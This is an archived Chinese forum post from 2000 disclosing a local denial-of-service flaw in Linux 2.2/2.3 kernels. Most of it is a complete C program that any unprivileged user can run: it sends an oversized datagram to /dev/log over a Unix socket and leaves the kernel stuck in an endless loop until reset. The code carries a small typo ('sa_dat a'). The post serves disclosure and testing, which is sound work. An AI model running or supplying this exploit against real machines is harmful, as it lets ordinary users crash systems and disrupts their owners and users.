发信人: netcc()
整理人: williamlong(2000-07-07 09:59:21), 站内信件
|
下面的小程序将导致Linux 2.2.12 (默认案子的Red Hat 6.1)系统挂起,
在2.2.14 (最新稳定内核)和2.3.99-pre2 (最新内核),各种Pentium机器上测试 通过。
而且允许改程序无需任何特别权利。
这将导致系统核心进入死循环(直到你按下reset键)。
漏洞检测程序如下:
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_dat a) );
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
return 0;
}
-- 我思念的城市已是黄昏
为何我总是对你一网情深!
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 210.75.33.203]
|
|